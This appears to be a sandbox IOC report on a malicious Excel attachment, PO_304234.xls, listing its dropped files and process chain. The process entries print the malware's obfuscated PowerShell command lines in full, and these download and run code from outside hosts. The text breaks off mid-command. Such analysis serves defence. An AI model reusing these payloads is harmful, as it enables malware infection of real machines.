IOC Report
PO_304234.xls

loading gif

Files

File Path
Type
Category
Malicious
PO_304234.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 02:26:14 2024, Security: 1
initial sample
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetworkroundthings[1].hta
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
modified
 malicious
C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
 malicious
C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
 malicious
C:\Users\user\Desktop\PO_304234.xls (copy)
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 05:56:44 2024, Security: 1
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wecreatedbuttersmoothbutterthings[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8DD0935E.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B73744D0.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Temp\04v4keoo.wzz.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\4vhnhywg.tnp.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\5dmchq4k.l3o.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\RES89F7.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Aug 28 04:56:34 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\RESCDF9.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Aug 28 04:56:52 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\a5lgtqgr.t5c.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\ajfkpe3p.xs0.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\asv5z5h3.skq.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\cjekjvlv.cge.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\h4uk5yx3.or4.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\imlwlgjg\CSCE8D62BF91CF49AAAEBCC2A37BB3C45C.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (351)
dropped
C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\lblvpikr.ff1.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\mjo4tj0d\CSC1D7DFCB3A844EFFBAC81F2560943E20.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (351)
dropped
C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\tx55osgy.rqb.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\wv5ktyxq.nn1.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\wx0aguex.ze2.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\~DF0756C079363CCFBF.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DF50002C428033D926.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFA39F7CCAE0ED4456.TMP
data
dropped
C:\Users\user\Desktop\A7130000
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 05:56:44 2024, Security: 1
dropped
C:\Users\user\Desktop\A7130000:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
There are 29 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
 malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
 malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline"
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBT? ? ? ? ?EQ? ? ? ? ?RQBS? ? ? ? ?C8? ? ? ? ?egBv? ? ? ? ?GI? ? ? ? ?LwBw? ? ? ? ?H? ? ? ? ?? ? ? ? ?bQBh? ? ? ? ?Hg? ? ? ? ?Lw? ? ? ? ?1? ? ? ? ?DU? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?DM? ? ? ? ?OQ? ? ? ? ?x? ? ? ? ?C4? ? ? ? ?Mw? ? ? ? ?u? ? ? ? ?DI? ? ? ? ?OQ? ? ? ? ?x? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? 